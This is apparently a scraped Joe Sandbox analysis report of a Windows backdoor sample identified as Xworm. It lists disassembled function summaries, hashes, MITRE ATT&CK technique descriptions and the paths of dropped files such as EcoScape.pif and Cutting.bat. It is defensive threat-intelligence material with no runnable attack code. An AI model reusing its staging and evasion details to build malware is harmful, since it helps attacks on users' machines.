Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: cbcf0487f2222cb4524ff73b6c5013c23aab5df10184951b129d0bbb54878851
Instruction ID: e811300fc766d83bb7a00f4513e2eac931f801a369bcb9d71f17932b4fbc06f7
Opcode Fuzzy Hash: cbcf0487f2222cb4524ff73b6c5013c23aab5df10184951b129d0bbb54878851
Instruction Fuzzy Hash: 0BF0F975E4111466D704A7658C41FFE7768EF52748F40092BB422A72C1DBA89908C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 004D8432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

GetWindowLongW.USER32(?,000000F0), ref: 004D8471
GetWindowLongW.USER32(?,000000EC), ref: 004D847F

Strings

(Q, xrefs: 004D843E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: LongWindow
String ID: (Q
API String ID: 1378638983-2768264020
Opcode ID: ebc1097bff708748c25bde36d6c3540fc18f41dadbdf781abb5e6541d5305580
Instruction ID: 82a224bf23d8fc9812932c70324aefc036c3c2e885619b4282fbe3516aaa2821
Opcode Fuzzy Hash: ebc1097bff708748c25bde36d6c3540fc18f41dadbdf781abb5e6541d5305580
Instruction Fuzzy Hash: 50F037312012859FC704DF69DC589AA77A9EB9A320F10862EF926873B0DB349851EB54

Uniqueness

Uniqueness Score: -1.00%

Function 004A1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004A146F

Strings

AutoIt, xrefs: 004A1463
Error allocating memory., xrefs: 004A1468

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 9ccd9c8d8d53386d0418814f9160fbddbaf7695a4d3a5ec0635f203d7cb10a45
Instruction ID: a8f8f9a3f0c0408eb4c7b3c0cf66d6da07eb80b00322cf743f006bd47119dfc1
Opcode Fuzzy Hash: 9ccd9c8d8d53386d0418814f9160fbddbaf7695a4d3a5ec0635f203d7cb10a45
Instruction Fuzzy Hash: 59E0D83168471436D2243795AC03FC97A888F06B55F11482FF788545C29EEB245042DE

Uniqueness

Uniqueness Score: -1.00%

Function 004610B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0045FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004610E2,?,?,?,0044100A), ref: 0045FAD9

IsDebuggerPresent.KERNEL32(?,?,?,0044100A), ref: 004610E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0044100A), ref: 004610F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004610F0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: b7ff158622ce434d144c191ae5e3c07517a5110f1be8c68f729a7a284173ff9a
Instruction ID: d823aee573015631f2486e66bde0843b9db02ea71194c25662e163865ba700d4
Opcode Fuzzy Hash: b7ff158622ce434d144c191ae5e3c07517a5110f1be8c68f729a7a284173ff9a
Instruction Fuzzy Hash: 19E0ED706007918BD3209F79E905746BBE4AB1470AF04CD6FE895C6661EBB8D488CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0045F151

Strings

`5Q, xrefs: 0045F131
h5Q, xrefs: 0045F146

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Init_thread_footer
String ID: `5Q$h5Q
API String ID: 1385522511-2430067419
Opcode ID: 468e91eacce813eed5ecb43418f32d5e730e927b2ed9816ca525bb4419cd3432
Instruction ID: 447423d3d30b32c8ac2f5c0ca4f34878157c3e1d98888da0d92e3418b3da9eb2
Opcode Fuzzy Hash: 468e91eacce813eed5ecb43418f32d5e730e927b2ed9816ca525bb4419cd3432
Instruction Fuzzy Hash: B3E0DFB1504C14DBC700D72CE8619C933A2BB05B25F12417AE90287292DB282E8EEA1F

Uniqueness

Uniqueness Score: -1.00%

Function 004D2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D2E08
PostMessageW.USER32(00000000), ref: 004D2E0F

Part of subcall function 004AF292: Sleep.KERNEL32 ref: 004AF30A

Strings

Shell_TrayWnd, xrefs: 004D2E01

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 44d0b66ea7e9c2e146757e2ea6f0f99c152a9ca58810c0cb3b86b53e579df1bc
Instruction ID: 4e35d6ad8b6de7277d4ee01da32987dd5603f7ef990fb7ab36f9be1833f7b7da
Opcode Fuzzy Hash: 44d0b66ea7e9c2e146757e2ea6f0f99c152a9ca58810c0cb3b86b53e579df1bc
Instruction Fuzzy Hash: D5D0A932B823007AE224A370AC0BFC62B14EB15B00F1008767205AA0C0C8A0A8008688

Uniqueness

Uniqueness Score: -1.00%

Function 004D2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004D2DDB

Part of subcall function 004AF292: Sleep.KERNEL32 ref: 004AF30A

Strings

Shell_TrayWnd, xrefs: 004D2DC1

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6b94c02dfed1e0c8ed3fa8a89c07ee075f339c11b90a553a784a721a7d028c61
Instruction ID: 8e3a635d004656d7b3d5dd374271b81b050839a9d0da6464bf2909325911a25a
Opcode Fuzzy Hash: 6b94c02dfed1e0c8ed3fa8a89c07ee075f339c11b90a553a784a721a7d028c61
Instruction Fuzzy Hash: FFD0A936B86300B6E224A370AC0BFD62B14EB10B00F1008767209AA0C0C8A0A8008688

Uniqueness

Uniqueness Score: -1.00%

Function 0047C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0047C213
GetLastError.KERNEL32 ref: 0047C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0047C27C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: c51bd115e689e636b29d8d2857ddeffadc0e2c6bfd3028412080227400cfe6f2
Instruction ID: 4b06e5150e98ff952a73a413476911204519407b31e74b53f05b66a3fb12461c
Opcode Fuzzy Hash: c51bd115e689e636b29d8d2857ddeffadc0e2c6bfd3028412080227400cfe6f2
Instruction Fuzzy Hash: 6041C730E00605EFDB218FE5C884AEB77A5EF55710F1481AFE85DA72A2DB348D01CB69

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\EcoVision Dynamics\A

C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js

C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cameras

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Commander

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cutting

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cutting.bat (copy)

Windows Analysis Report
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre